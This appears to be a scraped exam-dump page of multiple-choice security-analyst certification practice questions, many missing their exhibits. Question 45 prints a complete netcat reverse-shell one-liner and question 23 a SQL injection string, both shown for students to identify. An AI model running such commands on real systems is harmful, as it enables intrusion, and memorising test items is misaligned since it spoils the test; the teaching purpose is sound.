Halloween Special Sale Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: buysanta

Exact2Pass Menu

Question # 4

After completing a review of network activity. the threat hunting team discovers a device on the network that sends an outbound email via a mail client to a non-company email address daily

at 10:00 p.m. Which of the following is potentially occurring?

A.

Irregular peer-to-peer communication

B.

Rogue device on the network

C.

Abnormal OS process behavior

D.

Data exfiltration

Full Access
Question # 5

During the log analysis phase, the following suspicious command is detected-

Which of the following is being attempted?

A.

Buffer overflow

B.

RCE

C.

ICMP tunneling

D.

Smurf attack

Full Access
Question # 6

A new cybersecurity analyst is tasked with creating an executive briefing on possible threats to the organization. Which of the following will produce the data needed for the briefing?

A.

Firewall logs

B.

Indicators of compromise

C.

Risk assessment

D.

Access control lists

Full Access
Question # 7

A security analyst has received an incident case regarding malware spreading out of control on a customer's network. The analyst is unsure how to respond. The configured EDR has automatically obtained a sample of the malware and its signature. Which of the following should the analyst perform next to determine the type of malware, based on its telemetry?

A.

Cross-reference the signature with open-source threat intelligence.

B.

Configure the EDR to perform a full scan.

C.

Transfer the malware to a sandbox environment.

D.

Log in to the affected systems and run necstat.

Full Access
Question # 8

An organization recently changed its BC and DR plans. Which of the following would best allow for the incident response team to test the changes without any impact to the business?

A.

Perform a tabletop drill based on previously identified incident scenarios.

B.

Simulate an incident by shutting down power to the primary data center.

C.

Migrate active workloads from the primary data center to the secondary location.

D.

Compare the current plan to lessons learned from previous incidents.

Full Access
Question # 9

A payroll department employee was the target of a phishing attack in which an attacker impersonated a department director and requested that direct deposit information be updated to a new account. Afterward, a deposit was made into the unauthorized account. Which of the following is one of the first actions the incident response team should take when they receive notification of the attack?

A.

Scan the employee's computer with virus and malware tools.

B.

Review the actions taken by the employee and the email related to the event

C.

Contact human resources and recommend the termination of the employee.

D.

Assign security awareness training to the employee involved in the incident.

Full Access
Question # 10

Which of the following is the best metric for an organization to focus on given recent investments in SIEM, SOAR, and a ticketing system?

A.

Mean time to detect

B.

Number of exploits by tactic

C.

Alert volume

D.

Quantity of intrusion attempts

Full Access
Question # 11

Which of the following is a reason why proper handling and reporting of existing evidence are important for the investigation and reporting phases of an incident response?

A.

TO ensure the report is legally acceptable in case it needs to be presented in court

B.

To present a lessons-learned analysis for the incident response team

C.

To ensure the evidence can be used in a postmortem analysis

D.

To prevent the possible loss of a data source for further root cause analysis

Full Access
Question # 12

A security analyst reviews the following extract of a vulnerability scan that was performed against the web server:

Which of the following recommendations should the security analyst provide to harden the web server?

A.

Remove the version information on http-server-header.

B.

Disable tcp_wrappers.

C.

Delete the /wp-login.php folder.

D.

Close port 22.

Full Access
Question # 13

A security analyst is reviewing the following alert that was triggered by FIM on a critical system:

Which of the following best describes the suspicious activity that is occurring?

A.

A fake antivirus program was installed by the user.

B.

A network drive was added to allow exfiltration of data

C.

A new program has been set to execute on system start

D.

The host firewall on 192.168.1.10 was disabled.

Full Access
Question # 14

During an incident, some loCs of possible ransomware contamination were found in a group of servers in a segment of the network. Which of the following steps should be taken next?

A.

Isolation

B.

Remediation

C.

Reimaging

D.

Preservation

Full Access
Question # 15

An organization discovered a data breach that resulted in Pll being released to the public. During the lessons learned review, the panel identified discrepancies regarding who was responsible for external reporting, as well as the timing requirements. Which of the following actions would best address the reporting issue?

A.

Creating a playbook denoting specific SLAs and containment actions per incident type

B.

Researching federal laws, regulatory compliance requirements, and organizational policies to document specific reporting SLAs

C.

Defining which security incidents require external notifications and incident reporting in addition to internal stakeholders

D.

Designating specific roles and responsibilities within the security team and stakeholders to streamline tasks

Full Access
Question # 16

A security analyst recently joined the team and is trying to determine which scripting language is being used in a production script to determine if it is malicious. Given the following script:

Which of the following scripting languages was used in the script?

A.

PowerShel

B.

Ruby

C.

Python

D.

Shell script

Full Access
Question # 17

Which of the following is the best way to begin preparation for a report titled "What We Learned" regarding a recent incident involving a cybersecurity breach?

A.

Determine the sophistication of the audience that the report is meant for

B.

Include references and sources of information on the first page

C.

Include a table of contents outlining the entire report

D.

Decide on the color scheme that will effectively communicate the metrics

Full Access
Question # 18

A security analyst needs to provide evidence of regular vulnerability scanning on the company's network for an auditing process. Which of the following is an example of a tool that can produce such evidence?

A.

OpenVAS

B.

Burp Suite

C.

Nmap

D.

Wireshark

Full Access
Question # 19

A user downloads software that contains malware onto a computer that eventually infects numerous other systems. Which of the following has the user become?

A.

Hacklivist

B.

Advanced persistent threat

C.

Insider threat

D.

Script kiddie

Full Access
Question # 20

A security analyst noticed the following entry on a web server log:

Warning: fopen (http://127.0.0.1:16) : failed to open stream:

Connection refused in /hj/var/www/showimage.php on line 7

Which of the following malicious activities was most likely attempted?

A.

XSS

B.

CSRF

C.

SSRF

D.

RCE

Full Access
Question # 21

A company patches its servers using automation software. Remote SSH or RDP connections are allowed to the servers only from the service account used by the automation software. All servers are in an internal subnet without direct access to or from the internet. An analyst reviews the following vulnerability summary:

Which of the following vulnerability IDs should the analyst address first?

A.

1

B.

2

C.

3

D.

4

Full Access
Question # 22

An analyst is conducting monitoring against an authorized team that win perform adversarial techniques. The analyst interacts with the team twice per day to set the stage for the techniques to be used. Which of the following teams is the analyst a member of?

A.

Orange team

B.

Blue team

C.

Red team

D.

Purple team

Full Access
Question # 23

K company has recently experienced a security breach via a public-facing service. Analysis of the event on the server was traced back to the following piece of code:

SELECT ’ From userjdata WHERE Username = 0 and userid8 1 or 1=1;—

Which of the following controls would be best to implement?

A.

Deploy a wireless application protocol.

B.

Remove the end-of-life component.

C.

Implement proper access control.

D.

Validate user input.

Full Access
Question # 24

The security team reviews a web server for XSS and runs the following Nmap scan:

Which of the following most accurately describes the result of the scan?

A.

An output of characters > and " as the parameters used m the attempt

B.

The vulnerable parameter ID hccp://l72.31.15.2/1.php?id-2 and unfiltered characters returned

C.

The vulnerable parameter and unfiltered or encoded characters passed > and " as unsafe

D.

The vulnerable parameter and characters > and " with a reflected XSS attempt

Full Access
Question # 25

While a security analyst for an organization was reviewing logs from web servers. the analyst found several successful attempts to downgrade HTTPS sessions to use cipher modes of operation susceptible to padding oracle attacks. Which of the following combinations of configuration changes should the organization make to remediate this issue? (Select two).

A.

Configure the server to prefer TLS 1.3.

B.

Remove cipher suites that use CBC.

C.

Configure the server to prefer ephemeral modes for key exchange.

D.

Require client browsers to present a user certificate for mutual authentication.

E.

Configure the server to require HSTS.

F.

Remove cipher suites that use GCM.

Full Access
Question # 26

A small company does no! have enough staff to effectively segregate duties to prevent error and fraud in payroll management. The Chief Information Security Officer (CISO) decides to maintain and review logs and audit trails to mitigate risk. Which of the following did the CISO implement?

A.

Corrective controls

B.

Compensating controls

C.

Operational controls

D.

Administrative controls

Full Access
Question # 27

An incident response analyst is investigating the root cause of a recent malware outbreak. Initial binary analysis indicates that this malware disables host security services and performs cleanup routines on it infected hosts, including deletion of initial dropper and removal of event log entries and prefetch files from the host. Which of the following data sources would most likely reveal evidence of the root cause?

(Select two).

A.

Creation time of dropper

B.

Registry artifacts

C.

EDR data

D.

Prefetch files

E.

File system metadata

F.

Sysmon event log

Full Access
Question # 28

A company has the following security requirements:

. No public IPs

· All data secured at rest

. No insecure ports/protocols

After a cloud scan is completed, a security analyst receives reports that several misconfigurations are putting the company at risk. Given the following cloud scanner output:

Which of the following should the analyst recommend be updated first to meet the security requirements and reduce risks?

A.

VM_PRD_DB

B.

VM_DEV_DB

C.

VM_DEV_Web02

D.

VM_PRD_Web01

Full Access
Question # 29

Which of the following describes a contract that is used to define the various levels of maintenance to be provided by an external business vendor in a secure environment?

A.

MOU

B.

NDA

C.

BIA

D.

SLA

Full Access
Question # 30

An incident response team found IoCs in a critical server. The team needs to isolate and collect technical evidence for further investigation. Which of the following pieces of data should be collected first in order to preserve sensitive information before isolating the server?

A.

Hard disk

B.

Primary boot partition

C.

Malicious tiles

D.

Routing table

E.

Static IP address

Full Access
Question # 31

While reviewing web server logs, an analyst notices several entries with the same time stamps, but all contain odd characters in the request line. Which of the following steps should be taken next?

A.

Shut the network down immediately and call the next person in the chain of command.

B.

Determine what attack the odd characters are indicative of

C.

Utilize the correct attack framework and determine what the incident response will consist of.

D.

Notify the local law enforcement for incident response

Full Access
Question # 32

A SOC analyst determined that a significant number of the reported alarms could be closed after removing the duplicates. Which of the following could help the analyst reduce the number of alarms with the least effort?

A.

SOAR

B.

API

C.

XDR

D.

REST

Full Access
Question # 33

A technician identifies a vulnerability on a server and applies a software patch. Which of the following should be the next step in the remediation process?

A.

Testing

B.

Implementation

C.

Validation

D.

Rollback

Full Access
Question # 34

Which of the following is the most important factor to ensure accurate incident response reporting?

A.

A well-defined timeline of the events

B.

A guideline for regulatory reporting

C.

Logs from the impacted system

D.

A well-developed executive summary

Full Access
Question # 35

A company is in the process of implementing a vulnerability management program, and there are concerns about granting the security team access to sensitive data. Which of the following scanning methods can be implemented to reduce the access to systems while providing the most accurate vulnerability scan results?

A.

Credentialed network scanning

B.

Passive scanning

C.

Agent-based scanning

D.

Dynamic scanning

Full Access
Question # 36

An analyst is reviewing a dashboard from the company's SIEM and finds that an IP address known to be malicious can be tracked to numerous high-priority events in the last two hours. The dashboard indicates that these events relate to TTPs. Which of the following is the analyst most likely using?

A.

MITRE ATT&CK

B.

OSSTMM

C.

Diamond Model of Intrusion Analysis

D.

OWASP

Full Access
Question # 37

A vulnerability management team is unable to patch all vulnerabilities found during their weekly scans. Using the third-party scoring system described below, the team patches the most urgent vulnerabilities:

Additionally, the vulnerability management team feels that the metrics Smear and Channing are less important than the others, so these will be lower in priority. Which of the following vulnerabilities should be patched first, given the above third-party scoring system?

A.

InLoud:

Cobain: Yes

Grohl: No

Novo: Yes

Smear: Yes

Channing: No

B.

TSpirit:

Cobain: Yes

Grohl: Yes

Novo: Yes

Smear: No

Channing: No

C.

ENameless:

Cobain: Yes

Grohl: No

Novo: Yes

Smear: No

Channing: No

D.

PBleach:

Cobain: Yes

Grohl: No

Novo: No

Smear: No

Channing: Yes

Full Access
Question # 38

Exploit code for a recently disclosed critical software vulnerability was publicly available (or download for several days before being removed. Which of the following CVSS v.3.1 temporal metrics was most impacted by this exposure?

A.

Remediation level

B.

Exploit code maturity

C.

Report confidence

D.

Availability

Full Access
Question # 39

A Chief Information Security Officer wants to implement security by design, starting …… vulnerabilities, including SQL injection, FRI, XSS, etc. Which of the following would most likely meet the requirement?

A.

Reverse engineering

B.

Known environment testing

C.

Dynamic application security testing

D.

Code debugging

Full Access
Question # 40

A vulnerability analyst is writing a report documenting the newest, most critical vulnerabilities identified in the past month. Which of the following public MITRE repositories would be best to review?

A.

Cyber Threat Intelligence

B.

Common Vulnerabilities and Exposures

C.

Cyber Analytics Repository

D.

ATT&CK

Full Access
Question # 41

Which of the following should be updated after a lessons-learned review?

A.

Disaster recovery plan

B.

Business continuity plan

C.

Tabletop exercise

D.

Incident response plan

Full Access
Question # 42

A security analyst needs to mitigate a known, exploited vulnerability related not

tack vector that embeds software through the USB interface. Which of the following should the analyst do first?

A.

Conduct security awareness training on the risks of using unknown and unencrypted USBs.

B.

Write a removable media policy that explains that USBs cannot be connected to a company asset.

C.

Check configurations to determine whether USB ports are enabled on company assets.

D.

Review logs to see whether this exploitable vulnerability has already impacted the company.

Full Access
Question # 43

A laptop that is company owned and managed is suspected to have malware. The company implemented centralized security logging. Which of the following log sources will confirm the malware infection?

A.

XDR logs

B.

Firewall logs

C.

IDS logs

D.

MFA logs

Full Access
Question # 44

Which of the following best explains the importance of the implementation of a secure software development life cycle in a company with an internal development team?

A.

Increases the product price by using the implementation as a piece of marketing

B.

Decreases the risks of the software usage and complies with regulatory requirements

C.

Improves the agile process and decreases the amount of tests before the final deployment

D.

Transfers the responsibility for security flaws to the vulnerability management team

Full Access
Question # 45

A security analyst detected the following suspicious activity:

rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 > tmp/f

Which of the following most likely describes the activity?

A.

Network pivoting

B.

Host scanning

C.

Privilege escalation

D.

Reverse shell

Full Access
Question # 46

Which of the following concepts is using an API to insert bulk access requests from a file into an identity management system an example of?

A.

Command and control

B.

Data enrichment

C.

Automation

D.

Single sign-on

Full Access
Question # 47

In the last hour, a high volume of failed RDP authentication attempts has been logged on a critical server. All of the authentication attempts originated from the same remote IP address and made use of a single valid domain user account. Which of the following mitigating controls would be most effective to reduce the rate of success of this brute-force attack? (Select two).

A.

Increase the granularity of log-on event auditing on all devices.

B.

Enable host firewall rules to block all outbound traffic to TCP port 3389.

C.

Configure user account lockout after a limited number of failed attempts.

D.

Implement a firewall block for the IP address of the remote system.

E.

Install a third-party remote access tool and disable RDP on all devices.

F.

Block inbound to TCP port 3389 from untrusted remote IP addresses at the perimeter firewall.

Full Access
Question # 48

An organization receives a legal hold request from an attorney. The request pertains to emails related to a disputed vendor contract. Which of the following is the first step for the security team to take to ensure compliance with the request?

A.

Publicly disclose the request to other vendors.

B.

Notify the departments involved to preserve potentially relevant information.

C.

Establish a chain of custody, starting with the attorney's request.

D.

Back up the mailboxes on the server and provide the attorney with a copy.

Full Access
Question # 49

A security analyst would like to integrate two different SaaS-based security tools so that one tool can notify the other in the event a threat is detected. Which of the following should the analyst utilize to best accomplish this goal?

A.

SMB share

B.

API endpoint

C.

SMTP notification

D.

SNMP trap

Full Access
Question # 50

The Chief Information Security Officer (CISO) of a large management firm has selected a cybersecurity framework that will help the organization demonstrate its investment in tools and systems to protect its data. Which of the following did the CISO most likely select?

A.

PCI DSS

B.

COBIT

C.

ISO 27001

D.

ITIL

Full Access
Question # 51

An organization has activated the CSIRT. A security analyst believes a single virtual server was compromised and immediately isolated from the network. Which of the following should the CSIRT conduct next?

A.

Take a snapshot of the compromised server and verify its integrity

B.

Restore the affected server to remove any malware

C.

Contact the appropriate government agency to investigate

D.

Research the malware strain to perform attribution

Full Access
Question # 52

Which of the following is a commonly used four-component framework to communicate threat actor behavior?

A.

STRIDE

B.

Diamond Model of Intrusion Analysis

C.

Cyber Kill Chain

D.

MITRE ATT&CK

Full Access
Question # 53

A security analyst received a malicious binary file to analyze. Which of the following is the best technique to perform the analysis?

A.

Code analysis

B.

Static analysis

C.

Reverse engineering

D.

Fuzzing

Full Access
Question # 54

A security analyst is reviewing the findings of the latest vulnerability report for a company's web application. The web application accepts files for a Bash script to be processed if the files match a given hash. The analyst is able to submit files to the system due to a hash collision. Which of the following should the analyst suggest to mitigate the vulnerability with the fewest changes to the current script and infrastructure?

A.

Deploy a WAF to the front of the application.

B.

Replace the current MD5 with SHA-256.

C.

Deploy an antivirus application on the hosting system.

D.

Replace the MD5 with digital signatures.

Full Access
Question # 55

A security analyst needs to secure digital evidence related to an incident. The security analyst must ensure that the accuracy of the data cannot be repudiated. Which of the following should be implemented?

A.

Offline storage

B.

Evidence collection

C.

Integrity validation

D.

Legal hold

Full Access
Question # 56

An analyst investigated a website and produced the following:

Which of the following syntaxes did the analyst use to discover the application versions on this vulnerable website?

A.

nmap -sS -T4 -F insecure.org

B.

nmap -o insecure.org

C.

nmap -sV -T4 -F insecure.org

D.

nmap -A insecure.org

Full Access
Question # 57

An analyst discovers unusual outbound connections to an IP that was previously blocked at the web proxy and firewall. Upon further investigation, it appears that the proxy and firewall rules that were in place were removed by a service account that is not recognized. Which of the following parts of the Cyber Kill Chain does this describe?

A.

Delivery

B.

Command and control

C.

Reconnaissance

D.

Weaporization

Full Access
Question # 58

Which of the following is often used to keep the number of alerts to a manageable level when establishing a process to track and analyze violations?

A.

Log retention

B.

Log rotation

C.

Maximum log size

D.

Threshold value

Full Access
Question # 59

A systems administrator is reviewing after-hours traffic flows from data center servers and sees regular, outgoing HTTPS connections from one of the servers to a public IP address. The server should not be making outgoing connections after hours. Looking closer, the administrator sees this traffic pattern around the clock during work hours as well. Which of the following is the most likely explanation?

A.

Command-and-control beaconing activity

B.

Data exfiltration

C.

Anomalous activity on unexpected ports

D.

Network host IP address scanning

E.

A rogue network device

Full Access
Question # 60

The Chief Executive Officer (CEO) has notified that a confidential trade secret has been compromised. Which of the following communication plans should the CEO initiate?

A.

Alert department managers to speak privately with affected staff.

B.

Schedule a press release to inform other service provider customers of the compromise.

C.

Disclose to all affected parties in the Chief Operating Officer for discussion and resolution.

D.

Verify legal notification requirements of PII and SPII in the legal and human resource departments.

Full Access
Question # 61

An organization conducted a web application vulnerability assessment against the corporate website, and the following output was observed:

Which of the following tuning recommendations should the security analyst share?

A.

Set an Http Only flag to force communication by HTTPS.

B.

Block requests without an X-Frame-Options header.

C.

Configure an Access-Control-Allow-Origin header to authorized domains.

D.

Disable the cross-origin resource sharing header.

Full Access
Question # 62

A company has a primary control in place to restrict access to a sensitive database. However, the company discovered an authentication vulnerability that could bypass this control. Which of the following is the best compensating control?

A.

Running regular penetration tests to identify and address new vulnerabilities

B.

Conducting regular security awareness training of employees to prevent social engineering attacks

C.

Deploying an additional layer of access controls to verify authorized individuals

D.

Implementing intrusion detection software to alert security teams of unauthorized access attempts

Full Access
Question # 63

A managed security service provider is having difficulty retaining talent due to an increasing workload caused by a client doubling the number of devices connected to the network. Which of the following

would best aid in decreasing the workload without increasing staff?

A.

SIEM

B.

XDR

C.

SOAR

D.

EDR

Full Access
Question # 64

Which of the following best describes the reporting metric that should be utilized when measuring the degree to which a system, application, or user base is affected by an uptime availability outage?

A.

Timeline

B.

Evidence

C.

Impact

D.

Scope

Full Access
Question # 65

A security analyst receives an alert for suspicious activity on a company laptop An excerpt of the log is shown below:

Which of the following has most likely occurred?

A.

An Office document with a malicious macro was opened.

B.

A credential-stealing website was visited.

C.

A phishing link in an email was clicked

D.

A web browser vulnerability was exploited.

Full Access
Question # 66

An analyst investigated a website and produced the following:

Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-21 10:21 CDT

Nmap scan report for insecure.org (45.33.49.119)

Host is up (0.054s latency).

rDNS record for 45.33.49.119: ack.nmap.org

Not shown: 95 filtered tcp ports (no-response)

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 7.4 (protocol 2.0)

25/tcp closed smtp

80/tcp open http Apache httpd 2.4.6

113/tcp closed ident

443/tcp open ssl/http Apache httpd 2.4.6

Service Info: Host: issues.nmap.org

Service detection performed. Please report any incorrect results at https://nmap .org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 20.52 seconds

Which of the following syntaxes did the analyst use to discover the application versions on this vulnerable website?

A.

nmap-sS -T4 -F insecure.org

B.

nmap-0 insecure.org

C.

nmap-sV -T4 -F insecure.org

D.

nmap-A insecure.org

Full Access
Question # 67

A security analyst detects an email server that had been compromised in the internal network. Users have been reporting strange messages in their email inboxes and unusual network traffic. Which of the following incident response steps should be performed next?

A.

Preparation

B.

Validation

C.

Containment

D.

Eradication

Full Access
Question # 68

A security analyst must preserve a system hard drive that was involved in a litigation request Which of the following is the best method to ensure the data on the device is not modified?

A.

Generate a hash value and make a backup image.

B.

Encrypt the device to ensure confidentiality of the data.

C.

Protect the device with a complex password.

D.

Perform a memory scan dump to collect residual data.

Full Access
Question # 69

Several vulnerability scan reports have indicated runtime errors as the code is executing. The dashboard that lists the errors has a command-line interface for developers to check for vulnerabilities. Which of the following will enable a developer to correct this issue? (Select two).

A.

Performing dynamic application security testing

B.

Reviewing the code

C.

Fuzzing the application

D.

Debugging the code

E.

Implementing a coding standard

F.

Implementing IDS

Full Access
Question # 70

A SOC team lead occasionally collects some DNS information for investigations. The team lead assigns this task to a new junior analyst. Which of the following is the best way to relay the process information to the junior analyst?

A.

Ask another team member to demonstrate their process.

B.

Email a link to a website that shows someone demonstrating a similar process.

C.

Let the junior analyst research and develop a process.

D.

Write a step-by-step document on the team wiki outlining the process.

Full Access
Question # 71

There are several reports of sensitive information being disclosed via file sharing services. The company would like to improve its security posture against this threat. Which of the following security controls would best support the company in this scenario?

A.

Implement step-up authentication for administrators

B.

Improve employee training and awareness

C.

Increase password complexity standards

D.

Deploy mobile device management

Full Access
Question # 72

An email hosting provider added a new data center with new public IP addresses. Which of the following most likely needs to be updated to ensure emails from the new data center do not get blocked by spam filters?

A.

DKIM

B.

SPF

C.

SMTP

D.

DMARC

Full Access
Question # 73

A manufacturer has hired a third-party consultant to assess the security of an OT network that includes both fragile and legacy equipment Which of the following must be considered to ensure the consultant does no harm to operations?

A.

Employing Nmap Scripting Engine scanning techniques

B.

Preserving the state of PLC ladder logic prior to scanning

C.

Using passive instead of active vulnerability scans

D.

Running scans during off-peak manufacturing hours

Full Access
Question # 74

A list of loCs released by a government security organization contains the SHA-256 hash for a Microsoft-signed legitimate binary, svchost. exe. Which of the following best describes the result if security teams add this indicator to their detection signatures?

A.

This indicator would fire on the majority of Windows devices.

B.

Malicious files with a matching hash would be detected.

C.

Security teams would detect rogue svchost. exe processesintheirenvironment.

D.

Security teams would detect event entries detailing executionofknown-malicioussvchost. exe processes.

Full Access
Question # 75

A security team is concerned about recent Layer 4 DDoS attacks against the company website. Which of the following controls would best mitigate the attacks?

A.

Block the attacks using firewall rules.

B.

Deploy an IPS in the perimeter network.

C.

Roll out a CDN.

D.

Implement a load balancer.

Full Access
Question # 76

The analyst reviews the following endpoint log entry:

Which of the following has occurred?

A.

Registry change

B.

Rename computer

C.

New account introduced

D.

Privilege escalation

Full Access
Question # 77

A SOC manager receives a phone call from an upset customer. The customer received a vulnerability report two hours ago: but the report did not have a follow-up remediation response from an analyst. Which of the following documents should the SOC manager review to ensure the team is meeting the appropriate contractual obligations for the customer?

A.

SLA

B.

MOU

C.

NDA

D.

Limitation of liability

Full Access
Question # 78

Which of the following is the most important reason for an incident response team to develop a formal incident declaration?

A.

To require that an incident be reported through the proper channels

B.

To identify and document staff who have the authority to declare an incident

C.

To allow for public disclosure of a security event impacting the organization

D.

To establish the department that is responsible for responding to an incident

Full Access
Question # 79

An incident response team receives an alert to start an investigation of an internet outage. The outage is preventing all users in multiple locations from accessing external SaaS resources. The team determines the organization was impacted by a DDoS attack. Which of the following logs should the team review first?

A.

CDN

B.

Vulnerability scanner

C.

DNS

D.

Web server

Full Access
Question # 80

Which of the following best describes the importance of implementing TAXII as part of a threat intelligence program?

A.

It provides a structured way to gain information about insider threats.

B.

It proactively facilitates real-time information sharing between the public and private sectors.

C.

It exchanges messages in the most cost-effective way and requires little maintenance once implemented.

D.

It is a semi-automated solution to gather threat intellbgence about competitors in the same sector.

Full Access
Question # 81

The Chief Information Security Officer wants to eliminate and reduce shadow IT in the enterprise. Several high-risk cloud applications are used that increase the risk to the organization. Which of the following solutions will assist in reducing the risk?

A.

Deploy a CASB and enable policy enforcement

B.

Configure MFA with strict access

C.

Deploy an API gateway

D.

Enable SSO to the cloud applications

Full Access
Question # 82

An attacker recently gained unauthorized access to a financial institution's database, which contains confidential information. The attacker exfiltrated a large amount of data before being detected and blocked. A security analyst needs to complete a root cause analysis to determine how the attacker was able to gain access. Which of the following should the analyst perform first?

A.

Document the incident and any findings related to the attack for future reference.

B.

Interview employees responsible for managing the affected systems.

C.

Review the log files that record all events related to client applications and user access.

D.

Identify the immediate actions that need to be taken to contain the incident and minimize damage.

Full Access
Question # 83

A company recently experienced a security incident. The security team has determined

a user clicked on a link embedded in a phishing email that was sent to the entire company. The link resulted in a malware download, which was subsequently installed and run.

INSTRUCTIONS

Part 1

Review the artifacts associated with the security incident. Identify the name of the malware, the malicious IP address, and the date and time when the malware executable entered the organization.

Part 2

Review the kill chain items and select an appropriate control for each that would improve the security posture of the organization and would have helped to prevent this incident from occurring. Each

control may only be used once, and not all controls will be used.

Firewall log:

File integrity Monitoring Report:

Malware domain list:

Vulnerability Scan Report:

Phishing Email:

Full Access
Question # 84

A security administrator needs to import Pll data records from the production environment to the test environment for testing purposes. Which of the following would best protect data confidentiality?

A.

Data masking

B.

Hashing

C.

Watermarking

D.

Encoding

Full Access
Question # 85

During a scan of a web server in the perimeter network, a vulnerability was identified that could be exploited over port 3389. The web server is protected by a WAF. Which of the following best represents the change to overall risk associated with this vulnerability?

A.

The risk would not change because network firewalls are in use.

B.

The risk would decrease because RDP is blocked by the firewall.

C.

The risk would decrease because a web application firewall is in place.

D.

The risk would increase because the host is external facing.

Full Access
Question # 86

Several critical bugs were identified during a vulnerability scan. The SLA risk requirement is that all critical vulnerabilities should be patched within 24 hours. After sending a notification to the asset owners, the patch cannot be deployed due to planned, routine system upgrades Which of the following is the best method to remediate the bugs?

A.

Reschedule the upgrade and deploy the patch

B.

Request an exception to exclude the patch from installation

C.

Update the risk register and request a change to the SLA

D.

Notify the incident response team and rerun the vulnerability scan

Full Access
Question # 87

Following an incident, a security analyst needs to create a script for downloading the configuration of all assets from the cloud tenancy. Which of the following authentication methods should the analyst use?

A.

MFA

B.

User and password

C.

PAM

D.

Key pair

Full Access
Question # 88

A cloud team received an alert that unauthorized resources were being auto-provisioned. After investigating, the team suspects that crypto mining is occurring. Which of the following indicators would

most likely lead the team to this conclusion?

.

A.

High GPU utilization

B.

Bandwidth consumption

C.

Unauthorized changes

D.

Unusual traffic spikes

Full Access
Question # 89

A recent penetration test discovered that several employees were enticed to assist attackers by visiting specific websites and running downloaded files when prompted by phone calls. Which of the following would best address this issue?

A.

Increasing training and awareness for all staff

B.

Ensuring that malicious websites cannot be visited

C.

Blocking all scripts downloaded from the internet

D.

Disabling all staff members' ability to run downloaded applications

Full Access
Question # 90

A systems administrator is reviewing the output of a vulnerability scan.

INSTRUCTIONS

Review the information in each tab.

Based on the organization's environment architecture and remediation standards,

select the server to be patched within 14 days and select the appropriate technique

and mitigation.

Full Access
Question # 91

Which of the following in the digital forensics process is considered a critical activity that often includes a graphical representation of process and operating system events?

A.

Registry editing

B.

Network mapping

C.

Timeline analysis

D.

Write blocking

Full Access
Question # 92

A security analyst has found a moderate-risk item in an organization's point-of-sale application. The organization is currently in a change freeze window and has decided that the risk is not high enough to correct at this time. Which of the following inhibitors to remediation does this scenario illustrate?

A.

Service-level agreement

B.

Business process interruption

C.

Degrading functionality

D.

Proprietary system

Full Access
Question # 93

A security analyst needs to ensure that systems across the organization are protected based on the sensitivity of the content each system hosts. The analyst is working with the respective system

owners to help determine the best methodology that seeks to promote confidentiality, availability, and integrity of the data being hosted. Which of the following should the security analyst perform first to

categorize and prioritize the respective systems?

A.

Interview the users who access these systems,

B.

Scan the systems to see which vulnerabilities currently exist.

C.

Configure alerts for vendor-specific zero-day exploits.

D.

Determine the asset value of each system.

Full Access
Question # 94

A software developer has been deploying web applications with common security risks to include insufficient logging capabilities. Which of the following actions would be most effective to

reduce risks associated with the application development?

A.

Perform static analyses using an integrated development environment.

B.

Deploy compensating controls into the environment.

C.

Implement server-side logging and automatic updates.

D.

Conduct regular code reviews using OWASP best practices.

Full Access
Question # 95

During normal security monitoring activities, the following activity was observed:

cd C:\Users\Documents\HR\Employees

takeown/f .*

SUCCESS:

Which of the following best describes the potentially malicious activity observed?

A.

Registry changes or anomalies

B.

Data exfiltration

C.

Unauthorized privileges

D.

File configuration changes

Full Access
Question # 96

When starting an investigation, which of the following must be done first?

A.

Notify law enforcement

B.

Secure the scene

C.

Seize all related evidence

D.

Interview the witnesses

Full Access
Question # 97

A report contains IoC and TTP information for a zero-day exploit that leverages vulnerabilities in a specific version of a web application. Which of the following actions should a SOC analyst take first after receiving the report?

A.

Implement a vulnerability scan to determine whether the environment is at risk.

B.

Block the IP addresses and domains from the report in the web proxy and firewalls.

C.

Verify whether the information is relevant to the organization.

D.

Analyze the web application logs to identify any suspicious or malicious activity.

Full Access
Question # 98

Due to reports of unauthorized activity that was occurring on the internal network, an analyst is performing a network discovery. The analyst runs an Nmap scan against a corporate network to evaluate which devices were operating in the environment. Given the following output:

Which of the following choices should the analyst look at first?

A.

wh4dc-748gy.lan (192.168.86.152)

B.

lan (192.168.86.22)

C.

imaging.lan (192.168.86.150)

D.

xlaptop.lan (192.168.86.249)

E.

p4wnp1_aloa.lan (192.168.86.56)

Full Access
Question # 99

Which of the following responsibilities does the legal team have during an incident management event? (Select two).

A.

Coordinate additional or temporary staffing for recovery efforts.

B.

Review and approve new contracts acquired as a result of an event.

C.

Advise the Incident response team on matters related to regulatory reporting.

D.

Ensure all system security devices and procedures are in place.

E.

Conduct computer and network damage assessments for insurance.

F.

Verify that all security personnel have the appropriate clearances.

Full Access
Question # 100

A penetration tester is conducting a test on an organization's software development website. The penetration tester sends the following request to the web interface:

Which of the following exploits is most likely being attempted?

A.

SQL injection

B.

Local file inclusion

C.

Cross-site scripting

D.

Directory traversal

Full Access
Question # 101

After conducting a cybersecurity risk assessment for a new software request, a Chief Information Security Officer (CISO) decided the risk score would be too high. The CISO refused the software request. Which of the following risk management principles did the CISO select?

A.

Avoid

B.

Transfer

C.

Accept

D.

Mitigate

Full Access
Question # 102

Which of the following makes STIX and OpenloC information readable by both humans and machines?

A.

XML

B.

URL

C.

OVAL

D.

TAXII

Full Access
Question # 103

A network analyst notices a long spike in traffic on port 1433 between two IP addresses on opposite sides of a WAN connection. Which of the following is the most likely cause?

A.

A local red team member is enumerating the local RFC1918 segment to enumerate hosts.

B.

A threat actor has a foothold on the network and is sending out control beacons.

C.

An administrator executed a new database replication process without notifying the SOC.

D.

An insider threat actor is running Responder on the local segment, creating traffic replication.

Full Access
Question # 104

A security analyst is trying to validate the results of a web application scan with Burp Suite. The security analyst performs the following:

Which of the following vulnerabilitles Is the securlty analyst trylng to valldate?

A.

SQL injection

B.

LFI

C.

XSS

D.

CSRF

Full Access
Question # 105

A vulnerability scan of a web server that is exposed to the internet was recently completed. A security analyst is reviewing the resulting vector strings:

Vulnerability 1: CVSS: 3.0/AV:N/AC: L/PR: N/UI : N/S: U/C: H/I : L/A:L

Vulnerability 2: CVSS: 3.0/AV: L/AC: H/PR:N/UI : N/S: U/C: L/I : L/A: H

Vulnerability 3: CVSS: 3.0/AV:A/AC: H/PR: L/UI : R/S: U/C: L/I : H/A:L

